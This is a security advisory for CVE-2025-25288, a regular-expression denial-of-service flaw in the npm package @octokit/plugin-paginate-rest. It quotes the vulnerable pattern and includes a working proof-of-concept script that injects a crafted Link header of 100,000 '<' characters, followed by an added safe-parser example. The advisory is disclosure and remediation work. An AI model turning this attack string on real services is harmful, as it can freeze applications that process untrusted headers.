CVE-2025-25288
@octokit/plugin-paginate-rest has a Regular Expression in iterator Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
## Description
### Summary

For the npm package `@octokit/plugin-paginate-rest`, when calling `octokit.paginate.iterator()`, a specially crafted `octokit` instance, in particular one whose `request` returns a malicious `link` value in the `headers` of its response, can trigger a ReDoS attack.

### Details

The issue occurs at [line 39](https://github.com/octokit/plugin-paginate-rest.js/blob/main/src/iterator.ts) of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows:

```js
url = ((normalizedResponse.headers.link || "").match(
  /<([^>]+)>;\s*rel="next"/,
) || [])[1];
```

The regular expression `/<([^>]+)>;\s*rel="next"/` is susceptible to excessive backtracking, which results in a ReDoS (Regular Expression Denial of Service) condition. When a specially crafted `Link` header is processed, this can cause high CPU utilization and even service slowdowns or freezes.

### PoC

[The gist of PoC.js](https://gist.github.com/ShiyuBanzhou/d3f2ad000be8384d2105c87c2ed7ce7d)

1. Run `npm i @octokit/plugin-paginate-rest`.
2. Run `node poc.js`.
3. Result: the program gets stuck forever with high CPU usage.

```js
import { Octokit } from "@octokit/core";
import { paginateRest } from "@octokit/plugin-paginate-rest";

const MyOctokit = Octokit.plugin(paginateRest);
const octokit = new MyOctokit({
  auth: "your-github-token", // placeholder; the request never reaches GitHub
});

// Intercept the request to inject a malicious 'link' header for ReDoS
octokit.hook.wrap("request", async (request, options) => {
  const maliciousLinkHeader = "" + "<".repeat(100000) + ">"; // attack string
  return {
    data: [],
    headers: {
      link: maliciousLinkHeader, // Inject malicious 'link' header
    },
  };
});

// Trigger the ReDoS attack by paginating through GitHub issues
(async () => {
  try {
    for await (const normalizedResponse of octokit.paginate.iterator(
      "GET /repos/{owner}/{repo}/issues",
      { owner: "DayShift", repo: "ReDos", per_page: 100 }
    )) {
      console.log({ normalizedResponse });
    }
  } catch (error) {
    console.error("Error encountered:", error);
  }
})();
```

### Impact

#### What kind of vulnerability is it?

This is a *Regular Expression Denial of Service (ReDoS) vulnerability*, which occurs due to excessive backtracking in the regex pattern:

```js
/<([^>]+)>;\s*rel="next"/
```

When processing a specially crafted `Link` header, this regex can cause significant performance degradation, leading to high CPU utilization and potential service unresponsiveness.

#### Who is impacted?

* Users of `@octokit/plugin-paginate-rest` who call `octokit.paginate.iterator()` and process untrusted or manipulated `Link` headers.
* Applications relying on Octokit's pagination mechanism, particularly those handling large volumes of API requests.
* GitHub API consumers who integrate this package into their projects for paginated data retrieval.
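As an added example (not code from the advisory or from the octokit project), the vulnerable pattern from iterator.ts is shown beside a linear-time `Link` header parser that extracts the `rel="next"` URL without backtracking; the sample header and the attack string are constructed here, and the function names are assumptions.

```javascript
// Pattern quoted in the advisory: on a header made of many '<' followed by one
// '>', every '<' is tried as a start and [^>]+ is shrunk one char at a time,
// so matching is quadratic in the header length.
const VULNERABLE_NEXT_RE = /<([^>]+)>;\s*rel="next"/;

function nextUrlWithRegex(linkHeader) {
  return ((linkHeader || "").match(VULNERABLE_NEXT_RE) || [])[1];
}

// Linear-time alternative (assumed replacement, not the project's fix): split
// the header on commas, take the '<url>' token with indexOf, then scan the
// ';'-separated parameters for rel="next" (quoted or bare, possibly multi-valued).
function nextUrlSafe(linkHeader) {
  for (const part of (linkHeader || "").split(",")) {
    const start = part.indexOf("<");
    const end = part.indexOf(">", start + 1);
    if (start === -1 || end === -1) continue; // no '<url>' token in this part
    const url = part.slice(start + 1, end);
    const params = part.slice(end + 1).split(";");
    const isNext = params.some((p) => {
      const [name, value = ""] = p.split("=").map((s) => s.trim());
      const rels = value.replace(/^"|"$/g, "").split(/\s+/);
      return name === "rel" && rels.includes("next");
    });
    if (isNext) return url;
  }
  return undefined;
}

// Constructed sample header in the shape GitHub returns for paginated lists.
const SAMPLE_LINK =
  '<https://api.github.com/repositories/1/issues?per_page=100&page=2>; rel="next", ' +
  '<https://api.github.com/repositories/1/issues?per_page=100&page=5>; rel="last"';

// The advisory's attack string: 100000 '<' characters followed by a single '>'.
const ATTACK_LINK = "<".repeat(100000) + ">";

// Timed run of the safe parser on the attack string; the regex version is
// deliberately only run on the benign header.
function demo() {
  const t0 = performance.now();
  const result = nextUrlSafe(ATTACK_LINK);
  const ms = performance.now() - t0;
  return { benignRegex: nextUrlWithRegex(SAMPLE_LINK), benignSafe: nextUrlSafe(SAMPLE_LINK), attackSafe: result, attackMs: ms };
}

console.log(demo());
```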